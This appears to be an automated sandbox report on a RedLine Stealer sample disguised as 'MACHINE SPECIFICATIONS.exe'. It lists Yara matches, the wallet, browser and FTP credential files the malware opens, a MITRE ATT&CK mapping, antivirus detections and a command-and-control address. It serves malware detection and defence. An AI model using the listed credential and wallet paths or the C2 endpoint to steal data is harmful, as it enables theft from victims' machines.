                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.372098837.0000000006BA5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                        Stealing of Sensitive Information

                        barindex
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.258866341.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.260326785.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.259617695.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6376, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6432, type: MEMORYSTR
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: l1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                        Source: MACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: l5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.258866341.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.260326785.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.259617695.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6376, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6432, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.MACHINE SPECIFICATIONS.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.446b688.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.44464d8.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.MACHINE SPECIFICATIONS.exe.448b6a8.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.258866341.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.260326785.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.259617695.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6376, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 6432, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                        Valid Accounts221
                        Windows Management Instrumentation                        		Path Interception111
                        Process Injection                        		1
                        Masquerading                        		1
                        OS Credential Dumping                        		1
                        Query Registry                        		Remote Services1
                        Archive Collected Data                        		Exfiltration Over Other Network Medium1
                        Encrypted Channel                        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                        Default Accounts1
                        Native API                        		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                        Disable or Modify Tools                        		LSASS Memory331
                        Security Software Discovery                        		Remote Desktop Protocol3
                        Data from Local System                        		Exfiltration Over Bluetooth11
                        Non-Standard Port                        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)231
                        Virtualization/Sandbox Evasion                        		Security Account Manager11
                        Process Discovery                        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
                        Non-Application Layer Protocol                        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                        Process Injection                        		NTDS231
                        Virtualization/Sandbox Evasion                        		Distributed Component Object ModelInput CaptureScheduled Transfer2
                        Application Layer Protocol                        		SIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                        Hidden Users                        		LSA Secrets1
                        Application Window Discovery                        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.common21
                        Obfuscated Files or Information                        		Cached Domain Credentials1
                        Remote System Discovery                        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                        Software Packing                        		DCSync123
                        System Information Discovery                        		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                        Timestomp                        		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        MACHINE SPECIFICATIONS.exe19%VirustotalBrowse
                        MACHINE SPECIFICATIONS.exe15%ReversingLabsWin32.Trojan.AgentTesla

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        SourceDetectionScannerLabelLinkDownload
                        1.0.MACHINE SPECIFICATIONS.exe.400000.10.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.2.MACHINE SPECIFICATIONS.exe.400000.0.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.0.MACHINE SPECIFICATIONS.exe.400000.4.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.0.MACHINE SPECIFICATIONS.exe.400000.12.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.0.MACHINE SPECIFICATIONS.exe.400000.6.unpack100%AviraHEUR/AGEN.1216612Download File
                        1.0.MACHINE SPECIFICATIONS.exe.400000.8.unpack100%AviraHEUR/AGEN.1216612Download File

                        Domains

                        SourceDetectionScannerLabelLink
                        api.ip.sb4%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://service.r0%URL Reputationsafe
                        http://tempuri.org/Endpoint/EnvironmentSettings0%URL Reputationsafe
                        http://tempuri.org/0%URL Reputationsafe
                        http://ns.adobe.c/g0%URL Reputationsafe
                        http://tempuri.org/Endpoint/VerifyUpdateResponse0%URL Reputationsafe
                        http://go.micros0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnvironment0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnvironmentResponse0%URL Reputationsafe
                        http://tempuri.org/Endpoint/GetUpdates0%URL Reputationsafe
                        https://api.ipify.orgcookies//settinString.Removeg0%URL Reputationsafe
                        http://185.222.58.90:179100%VirustotalBrowse
                        http://185.222.58.90:179100%Avira URL Cloudsafe
                        http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                        http://tempuri.org/Endpoint/VerifyUpdate0%URL Reputationsafe
                        http://tempuri.org/00%URL Reputationsafe
                        http://support.a0%URL Reputationsafe
                        http://ns.adobe.cobj0%URL Reputationsafe
                        http://tempuri.org/Endpoint/CheckConnectResponse0%URL Reputationsafe
                        http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                        https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%URL Reputationsafe
                        https://helpx.ad0%URL Reputationsafe
                        http://tempuri.org/Endpoint/CheckConnect0%URL Reputationsafe
                        http://tempuri.org/Endpoint/SetEnviron0%URL Reputationsafe
                        https://get.adob0%URL Reputationsafe
                        http://tempuri.org/t_$k0%Avira URL Cloudsafe
                        http://185.222.58.90:10%Avira URL Cloudsafe
                        http://185.222.58.90:17910/0%Avira URL Cloudsafe
                        http://forms.rea0%URL Reputationsafe
                        http://tempuri.org/Endpoint/GetUpdatesResponse0%URL Reputationsafe
                        http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%URL Reputationsafe
                        http://ns.ado/10%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api.ip.sb
                        		unknown
                        		unknowntrueunknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://185.222.58.90:17910/true
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://duckduckgo.com/chrome_newtabtmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                          		high
                          http://service.rMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=tmpD3.tmp.1.dr, tmp396.tmp.1.dr, tmp6B6.tmp.1.dr, tmp5EA.tmp.1.dr, tmp51E.tmp.1.dr, tmpFF0D.tmp.1.dr, tmp452.tmp.1.dr, tmp1CE.tmp.1.dr, tmp744.tmp.1.dr, tmp8DB.tmp.1.dr, tmp7DDD.tmp.1.dr, tmp29B.tmp.1.drfalse
                            		high
                            https://support.google.com/chrome/?p=plugin_wmpMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://support.google.com/chrome/answer/6258784MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://tempuri.org/Endpoint/EnvironmentSettingsMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/soap/envelope/MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://support.google.com/chrome/?p=plugin_flashMACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/soap/envelope/DMACHINE SPECIFICATIONS.exe, 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://ns.adobe.c/gMACHINE SPECIFICATIONS.exe, 00000001.00000003.364123471.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.350858355.0000000009161000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364140812.0000000009170000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000003.364246752.0000000009174000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://support.google.com/chrome/?p=plugin_javaMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/Endpoint/VerifyUpdateResponseMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://go.microsMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://tempuri.org/Endpoint/SetEnvironmentMACHINE SPECIFICATIONS.exe, 00000001.00000002.365923298.00000000034F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://tempuri.org/Endpoint/SetEnvironmentResponseMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://tempuri.org/Endpoint/GetUpdatesMACHINE SPECIFICATIONS.exe, 00000001.00000002.365714894.00000000033E2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.365596726.000000000339F000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://support.google.com/chrome/?p=plugin_realMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.ipify.orgcookies//settinString.RemovegMACHINE SPECIFICATIONS.exe, 00000000.00000002.280605622.000000000448B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280657393.00000000044D6000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.364558379.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000000.257898395.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                          • URL Reputation: safe
                                          		unknown
                                          http://185.222.58.90:17910MACHINE SPECIFICATIONS.exe, 00000001.00000002.365714894.00000000033E2000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/faultMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.interoperabilitybridges.com/wmp-extension-for-chromeMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://support.google.com/chrome/?p=plugin_pdfMACHINE SPECIFICATIONS.exe, 00000001.00000002.366223406.0000000003742000.00000004.00000800.00020000.00000000.sdmp, MACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://support.google.com/chrome/?p=plugin_divxMACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_SlMACHINE SPECIFICATIONS.exe, 00000001.00000002.366318000.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://tempuri.org/Endpoint/VerifyUpdateMACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://tempuri.org/0MACHINE SPECIFICATIONS.exe, 00000001.00000002.365560518.0000000003351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
